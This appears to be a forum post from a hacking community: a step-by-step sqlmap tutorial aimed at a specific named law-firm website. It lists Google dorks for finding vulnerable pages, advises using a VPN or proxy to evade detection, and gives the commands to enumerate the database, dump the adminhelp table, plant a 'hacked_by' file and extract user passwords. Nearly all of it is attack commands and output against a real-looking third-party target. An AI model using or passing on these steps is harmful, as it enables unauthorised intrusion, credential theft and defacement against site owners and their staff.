hello all members!

injection tool: sqlmap

official page: http://sqlmap.org

download link: https://github.com/sqlmapproject/sqlmap/zipball/master

testing: windows xp/sp3 , python 2.7.5

vulnerability page: http://www.godwins-law.co.uk/staff.php?id=10'

!!!!! use openvpn or proxy !!!!!

step1. target

google dork: inurl:index.php , inurl:staff.php , inurl:show.php , inurl:login.php , etc...

target: http://www.godwins-law.co.uk/staff.php?id=10

target webserver operating system: windows 2003

target webapplication: asp.net , microsoft iis 6.0 , php 5.2.8

target backenddatabase: mysql 5.0.0

step2. database

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --dbs

--database--

godwins
information_schema

step3. table

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -d godwins --tables

--table--

adminhelp
articlecats
articles
contentimages
imagelib
news
pages
staff

step4. column & dump

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -d godwins -t adminhelp --columns

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -d godwins -t adminhelp --dump

step5. hacked text

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --file-dest=hacked_by_sasami_327.txt

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --file-read=hacked_by_sasami_327.txt

step6. user & password

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --users --passwords